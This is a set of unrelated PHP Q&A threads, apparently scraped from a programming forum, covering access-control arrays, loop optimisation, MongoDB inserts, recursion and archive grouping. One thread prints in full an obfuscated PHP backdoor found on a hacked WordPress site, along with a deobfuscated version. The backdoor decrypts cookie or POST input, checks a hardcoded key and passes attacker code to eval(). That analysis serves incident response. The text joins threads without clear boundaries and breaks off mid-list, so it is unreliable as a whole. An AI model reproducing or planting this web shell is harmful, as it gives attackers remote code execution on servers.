I am developing an access control library for my project and I am looking to the best solution to do this:
I am getting all my access list from database to an array. In result it looks like this:
$array = array(
'*' => array('administrator' => TRUE),
'frontend/*' => array(
'user' => TRUE,
'unregistered' => TRUE
),
'backend/*' => array(
'user' => FALSE,
'unregistered' => FALSE
),
'backend/user/*' => array(
'moderator' => FALSE,
'supermoderator' => TRUE,
),
'backend/article/*' => array(
'supermoderator' => TRUE
),
'backend/article/add/new' => array(
'moderator' => TRUE
)
);
The " * " means this user has access all of that related options backend/article/* means that group have access to all article options (article/add, article/remove, ...).
As you see the there is no item in backend/article/add for supermoderator but it has the master access to all article pages.
What is the best way to check this? I tried array_walk() but I guess it wont help me.
Thank you for advices...
I can share my whole code if you want.
* Edit *
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
Thank you for any advices
No matter what this is going to be a complex algorithm, a simple array_walk wont do. Unless someone is feeling particularly generous and will write one for you, I suggest you hire a programmer.
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
It totally depends on your algorithm. You can probably write one that uses your current data format. You can also probably write a simpler one if you change your data format. But what your data format should look like then, well, that's a job for a programmer.
I found the answer myself:
lets say the user trying to access backend/article/add/new and this user in the supermoderator group. So I need to look for backend/*, backend/article/*, backend/article/add/*. array_slice() and for() enough for this:
I am using CodeIgniter by the way. I modified it a little bit to seperate frontend and backend controllers. I am not using application/controller directory. I am using application/backend and application/frontend directories for controllers.
So an uri pattern is this: http://site.com/[backend]*/[directory]*/class/method
// This is the page that user trying to reach
$requested_page = "backend/article/add/new";
// pharsing...
$x = explode('/', $requested_page);
// this is needed to cut last 3, 2, 1 items of $x
$i = count($x) > 3 ? -4 : -count($x);
for (; $i < 0; $i++) {
$resource = implode('/', array_slice($x, 0, $i)) . '/*';
// echoing for debug
echo $resource;
}
// Outputs:
// backend/*
// backend/article/*
// backend/article/add/*
function userHasPermissions($permissionsArray, $user, $path) {
// Check exact
if(isset($permissionsArray[$path]) &&
isset($permissionsArray[$path][$user])) {
return $permissionsArray[$path][$user];
}
// Check lower and lower
$partArr = explode('/', $path);
for($i = substr_count($path, '/'); $i >= 0; $i--) {
if($i > 0) {
$choppedPartArr = array_slice($partArr, 0, $i);
$newPath = implode($choppedPartArr, '/') . '/*';
} else {
$newPath = '*';
}
if(isset($permissionsArray[$newPath]) &&
isset($permissionsArray[$newPath][$user])) {
return $permissionsArray[$newPath][$user];
}
}
return false;
}
echo "Result: " . (userHasPermissions($array, 'supermoderator', 'backend/article/add') ? "true" : "false");
Note that 'backend/article' will return false for 'supermoderator' since 'backend/article/*' does not match it. To change this, simply change $i = substr_count($path, '/'); to $i = substr_count($path, '/')+1;.
Related
I am having the foreach loop that will run minimum 2000 loops
foreach ($giftCardSchemeData as $keypreload => $preload) {
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$cardnumber = self::getCardNumber();
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card" ;
$giftCardSchemeDataDb = array('preload' => array('value' => $preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' => $cardexistencetype, 'isgiftcard' => true , 'giftcardamount' => $preload['value'],'giftCardSchemeData' => json_encode($giftCardSchemeDataDb), 'expirymonths' => $preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' => null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null, 'pinnumber' => mt_rand(100000,999999));
$output = array_merge($data, $otherdata);
// var_dump($output);
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Like above foreach I am having totally 5 of them. When I call the function each time the 5 foreach runs and then return the response. It take more time and the php maximum execution time occurs.
Is there a any way to send the response and then we could run the foreach in server side and not creating the maximum execution time issue.Also need an optimization for the foreach.
Also In symfony I have tried the try catch method for the existence check in the above code it return the Entity closed Error. I have teprorily used the existence check in Db but need an optimization
There seems to be a lot wrong (or to be optimized) with this code, but let's focus on your questions:
First I think this code shouldn't be in code that will be triggered by a visitor.
You should seperate 2 processes:
1. A cronjob that runs that will generate everything that must be generated and saved that generated info to a database. The cronjob can take as much time as it needs. Look at Symfony's console components
2. A page that displays only the generated info by fetching it from the database and passing it to a Twig template.
However, looking at the code you posted I think it can be greatly optimized as is. You seem to have a foreach loop that fetches variable data, and in that you have a for-loop that does not seem to generate much variability at all.
So most of the code inside the for loop is now being executed over and over again without making any actual changes.
Here is a concept that would give much higher performance. Ofcourse since I don't know the actual context of your code you will have to "fix it".
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card";
foreach ($giftCardSchemeData as $keypreload => $preload) {
$cardnumber = self::getCardNumber();
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
$giftCardSchemeDataDb = array('preload' => array('value' =>
$preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' =>
$cardexistencetype, 'isgiftcard' => true , 'giftcardamount' =>
$preload['value'],'giftCardSchemeData' =>
json_encode($giftCardSchemeDataDb), 'expirymonths' =>
$preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' =>
null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null,
'pinnumber' => 0);
$output = array_merge($data, $otherdata);
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$output['pinnumber'] = mt_rand(100000,999999);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Also: if in this code you are triggering any database inserts or updates, you don't want to trigger them each iteration. You will want to start some kind of database transaction and flush the queries each X iterations instead.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
One of my clients using WordPress got hacked with some malicious code like below, There are lots of file like this in all over her public_html. Though I told her to delete everything and re-upload all and update framework, plugins etc but I also want to know how can I de-obfuscate the codes
Why? Because my VPS provider told me that some hacking attempt was done using my IP (main server) to some news channel and I should stop from this kind of activities or they will simply discontinue my VPS.
So could anyone guide me to know exact code so I can analyze what kind of harms it may done.
Please note I've done jail-shell, CSF, blocking IP still it finds some way.
<?php
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
#$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}
foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
{
$v40207 = Array(
$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => #$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
);
echo #$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
}
elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
{
eval($n1f035[$GLOBALS['efaa04'][40]]);
}
exit();
}
Tried to decode it with http://localhost/script.php?testGet=sss and got result
Array
(
[_GET] => Array
(
[testGet] => sss
)
[_POST] => Array
(
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[GLOBALS] => Array
*RECURSION*
[efaa04] => > ,Fg7R2}Sl{a)nhO?#P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
[m56df3a] => chr
[ue8410] => ord
[x6a870c8] => strlen
[rfa65] => ini_set
[ne6255ab9] => serialize
[y648d6] => phpversion
[h8f865758] => unserialize
[j51e1d] => base64_decode
[y8512e] => set_time_limit
[t4193646] => q471
[t297c] => n6ee1
[uaf6e192f] => Array
(
)
[mb1694f] => Array
(
)
[n1f035] =>
[la02268b] =>
[ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)
got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)
I've told my client them to delete all files and re-upload from the backup. As I said I've found so many C99madshell (raw), is this kind of same in obfuscating manner.
Please note I've found a way to protect by searching malicious code and deleting them. Then run a command like chattr -R +i ./public_html then it seems stopped though i'm sure there are many backdoor scripts still inside. but if I would know exact code of above would be better.
I agree with #Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot -from it.
I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.
First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.
Some lines like this revealed:
$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...
After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:
<?php
#ini_set("error_log", NULL);
#ini_set("log_errors", 0);
#ini_set("max_execution_time", 0);
#set_time_limit(0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207 < strlen($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}
foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($_POST as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
if ($n1f035["a"] == "i")
{
$v40207 = Array(
"pv" => #phpversion(),
"sv" => "1.0-1",
);
echo #serialize($v40207);
}
elseif ($n1f035["a"] == "e")
{
eval($n1f035["d"]);
}
exit();
}
De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.
Fixing you client's site and keeping it safe is your homework, but I look forward for a discussion around de-obfuscation and techniques to do so.
A tip: Use find . -type f -printf '%T# %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed in the same day, or close dates at least, so that help to clean up the mess if you can't just wipe things clean at the moment.
So, I've been working on this code for some time, but I'm giving up, and reaching out for help from you guys. I've been looking at documentation for MongoDB and PHP, but I can't find anything. What I want to do is take the sample code for inserting a record:
$obj = array( "title" => "Calvin and Hobbes", "author" => "Bill Watterson" );
And re-purpose is for my project (as shown):
$obj = array( $startCol => $startRow );
The thing is that $startCol and $startRow are arrays, and it gives me a problem every time I want to run the document. Is there something ridiculously simple I'm missing here? Thanks in advance.
Chunk of code that's giving me problems:
$maxRows= count($currentarray); //Outputs 45
$maxCols= count($currentarray[0]); //Outputs 9
$currentRow=1;
$currentCol=1;
$testing = 1;
do {
while ($currentCol<$maxCols){
$startCol[] = $currentarray[0][$currentCol];
$startRow[] = $currentarray[$currentRow][$currentCol];
$currentCol++;
}
$obj = array( $startCol => $startRow );
$collection->insert($obj);
print_r ($collection);
if ($currentCol==$maxCols)
$currentCol=1;
$currentRow++;
$testing++;
//echo "<br />";
} while ($currentRow<$maxRows);
The problem I was getting was with my output statement. So my answer was fairly simple. After, print_r() all of my variables I found that I was in fact storing them, but I was calling them incorrectly at the end of the program.
function my_recurse($id,$tree=array())
{
$hols = array();
$overall = array();
$asd = $this->db->get_where('story', array('story_id'=>$id))->row_array();
if(isset($asd['story_id'])){
$preds = explode(',',$asd['story_pred']);
if($preds[0] != 0)
{
$hols[] = $preds[0];
$hols = array_merge($tree, $hols);
$this->my_recurse($preds[0],$hols);
}
}
print_r($hols);
}
say for example i have this tree
story1 NULL
story2 story1
story3 story2
story4 story3
and when i enter story4 as my id in the function it always returns the story3 and not story1,story2 and story3. dont know why it reverses the output after the recursion happens. any suggestions would be appreciated
It's hard to say if this will be easy or possible without knowing your database structure, but you don't need recursion to find the path of a tree node to the root - you can do this with a self join. Also, you should avoid making a query in a recursive function. If you can describe your table structure I can attempt to show you how to get a result set that is the tree path in order.
The problem with your code is that its passing the current preds up to the parent hence the reverse tree. Instead it should be getting the preds from the parent
This should work if I understood your requirements clearly
<?php
function my_recurse($id) {
$hols = array();
$overall = array();
$asd = getFromDB($id);
if(isset($asd['story_id'])){
$preds = explode(',',$asd['story_pred']);
if($preds[0] != 0) {
$hols[] = $preds[0];
$hols = array_merge(my_recurse($preds[0]), $hols);
} else {
return $hols;
}
print "preds of {$id} : ";
print implode(', ', $hols) . "\n";
return $hols;
}
}
function getFromDB($id) {
$data = array(1 => array('story_id'=>1, 'story_pred' => '0'),
2 => array('story_id'=>2, 'story_pred' => '1'),
3 => array('story_id'=>3, 'story_pred' => '2'),
4 => array('story_id'=>4, 'story_pred' => '3'),
);
return $data[$id];
}
my_recurse(4);
Running the script above..
$ /usr/bin/php recurse.php
preds of 2 : 1
preds of 3 : 1, 2
preds of 4 : 1, 2, 3
PS: Please add your sample input, output and expected output. It took me 15 minutes to try understanding your problem.
I'm looking for a better optimized way to find and group multipart archives from an array of filenames
I have as an input for example:
array(
books.part1.rar,
books.part3.rar,
00000114.rar,
svoy_20ostrov.rar,
svoy_20ostrov.rar,
koncert_20v_20dk_20mir.rar,
koncert_20v_20centralnom_20teatre_20kukol.rar,
LP_LIVE_PR_Tampa.part2.rar,
koncert_20v_20dk_20vami.rar,
